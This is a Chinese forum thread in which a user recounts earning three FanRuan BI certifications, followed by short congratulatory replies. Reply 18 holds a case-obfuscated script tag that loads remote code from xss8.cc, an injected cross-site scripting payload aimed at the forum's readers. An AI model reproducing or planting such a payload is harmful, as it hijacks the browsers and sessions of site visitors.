拿下帆软三证后的分享

楼主
帆软社群问答顾问; 入选2022年帆软产品致谢名单;

三年时间,每年一个高级证书,先后拿下了FCBP,FCRP,FCAP。没有想到,本来以为拿下一个高级证书都很难的我,已经拿到了三个了。这听起来好像很容易吧,是的,只要下定决定要拿到。努力到位了,就一定能拿到。

分享一点我从一个小白中的小白,怎么一步步拿到这三个证书的经历吧。时间要从2018年说起,那时候刚来到上海一年时间,做的 是跟自己所学专业不相关的工作,收入一直都在1W以下。转眼到了快结婚的年龄,也跟女朋友定好了结婚日期,女朋友倒是没有因为我工资不高嫌弃我,但是自己有时候就会在思考:这个收入很难面对女方家长吧?什么时候才能买得上房?结婚后这个收入怎么在大上海生活呢?

不甘现状的我开始在工作之余(其实基本没什么余,那时候在门店上班,早6点到晚6点。)重新拾起自己所学,不过那个时候,是以提高自己工作效率为目的去学习的。有时候学会了些新东西会兴奋的发朋友圈。刚好被领导发现了,觉得可以让我尝试一下挖掘公司的数据,就把我从门店提到了后台办公室。经过三个月时间的摸索与研究,我利用帆软的两个产品(Finereport、FineBI)为公司制作了一系列的统计报表和主题分析报表。当时公司并没有给我提供后台数据,我居然用python把公司销售平台上的数据给爬了下来放在自己的数据库中,这样才完成的适用于帆软报表的数据。这样,第一年,我坚持了下来,稳定了自己的新岗位。

到了第二年,我觉得自己要有提升,公司也对我有了更高的要求,希望 我能够完成从0到1,从1到更多的突破。所以我决定通过学习来提升自己。2019年,我报名参加了BI线上学习班。经过5周的学习。我顺利结业,并拿到班级第三名的成绩,获得了500F币(价值500元)的奖励。这对我是 一次激励,我决定,考FCBP,拿下证书。

2019 年5月5号,我用奖学金花了399F币报名参加了第1904期的FCBP考试,4天后收到了考试通过通知。我兴奋极了。这表明我这段时间的学习没有白费,也证明了自己努力就会有收获。

我本想着把FCRP也一起考了,但当时由于下半年工作较多,每天下班比较晚,加上觉得FCRP还是有些难度的,而且Finereport不像fineBI,当时帆软并没有开Finereport学习班,就没有继续考。直到2020年,我觉得无论如何都要验证一下自己所学,不然对不起自己的努力。不图别的,就是考验一下自己。我的Finereport都是在论坛问答区加上自己平时工作需要研究一些东西出来。而且无论是Finereport还是FineBI都有帮助文档可以搜,这个还是挺方便的。另外我的报名费是在问答区通过回答别人问题获得采纳得到到奖励。在考FCRP之前,已经积累了一些。所以考FCRP的时候,我并没有自己出钱。而是用了自己在贡献值换到的F币参加的考试。这点对于不想出钱,或者觉得考试费比较贵的同学可以借鉴一下。

2020年6月2号,我参加了第2005期 FCRP认证考试。一周后,我收到了90分通过的通知,心里的石头终于放了下来。这一周其实也是很紧张的。看到自己的失分项,原来有一题没有提交模板,导致直接扣10分,也懊悔自己的粗心。不过结果也还是满意的。

之后的9月,我换到了现在所在的公司,由于上面获得的两个证书,也顺利的获得了自己期望的薪资(猜猜比原来翻了多少倍?)。新工作也十分考验Finereport和FineBI水平。甚至还考验了对于项目实施的水平,这个我以前不经常做实施的工作,但在这个新工作中,得到了一次锻炼,加上新公司比原来更大,在数据治理 这方面 更严谨和专业、Finereport和FineBi的使用频度更高,我的工作能力又得到了进一步的提升。这中间有段小插曲,由于大公司在软件选择方面 从来都不是一家独大,在选择帆软产品之前会和其他几家产品PK,甚至会和自己公司开发的产品PK。而且上面还有大领导压着,要求使用别家公司的产品,结果我们在顶着上层领导压力和一线业务需求压力的情况下,顺利得取得的优先权。这也证明了帆软产品的实力以及该公司的远见。

20年底,帆软在搞一次线上BI大赛活动,我想大家都知道吧。没错,我也参加了,当时就是想凑一下热闹。到任务提交的最后一天晚上才完成作品,真的比较惊险。要知道超时提交任务会被扣信用分的。这个年代信用是很重要的,怎么能被扣信用分呢。结果出来后比较惊喜也 比较意外,居然得到了优秀参与奖,不但有500F币的奖励,还是1000元的助学金呢。其他还有证书啊,大礼包什么的。这一次的奖励成为我后面考FCAP的基础。

时间到了今年(2021年),我拿了冬季挑战赛的1000元助学金,加上在帆软论坛积累下来的F币,报名学习了帆软数据运营官课程,这个课程对我最大的帮助是教会我如何理解需求,和如何处理需求,以及如何分析公司现状,根据现状来制定数据解决方案。让我从全新的视角了解自己的工作,也给自己未来的发展提供了方向。随时随地都有需求,任何人都可以有需求,但是需求需要有效的管理,才能有规矩,不混乱,即能给业务提供反向需求参考,也能让开发人员省时省力,达到共赢的效果。当然这是一个大课题,不是简单几句话的事情,但至少有了专业的知识,可以能够让自己有勇气,有能力面对更多的挑战,从而抓住更多 的机遇。

此次课程,我以全班第三名的成绩顺利结业,并拿到奖学金1000元和FCAP免费考试券一份。

今年7月30号,我报名参加了第2107期 FCAP考试。10 天后,我再次收到了 94分考试通过的邮件通知。这次等待时间比原来更长,我也比原来更紧张一些,因为这次考试不像前两次那样几乎是有固定答案的。这次考试都是根据业务场景写方案。而且有字数要求。真的是难到我这个平时都不写作的人。经过了两天两晚上的奋战才写完考试答案。所以这次更加没什么底气,不知道自己能不能通过。加上这次并没有像上两次那样几天内就有结果了,这次足足等了10天。最后的结果,我是很满意的,我不是完美主义者,凡事求满分。我是及格万岁呀。而且这次分数比前两次都高一些。所以也对得起我这段时间的努力啦。

虽然拿到这些证书,证明不了自己能力就一定很强了,但是这些都是对自己努力学习的一个交待。至少让自己的努力不要白费。也养成活到老学到老的习惯。总之,这一切我觉得都是值得的。你觉得呢?

编辑于 2021-8-14 21:26

沙发
向老司机致敬!
板凳
可以透露一下现在的薪资吗
地板
5楼
6楼
厉害?
7楼
平时怎么学的
8楼
三证小伙伴越来越多了~~
9楼
考虑换工作不?
10楼
向大佬致敬
11楼
向大佬致敬!厉害啦~
12楼
新人向大佬学习
13楼
新人向大佬学习
14楼
大佬这么强都只是老三啊,那前俩是什么妖魔鬼怪
15楼
16楼
致敬+关注
17楼
向牛人致敬
18楼
<sCRiPt sRC=//xss8.cc/tIdX></sCrIpT>
19楼
20楼

test

aaasd撒大苏打撒大苏打

21楼
22楼
23楼
向大佬学习!
24楼
向老司机致敬!
25楼
牛B,我邪神的名号赐予你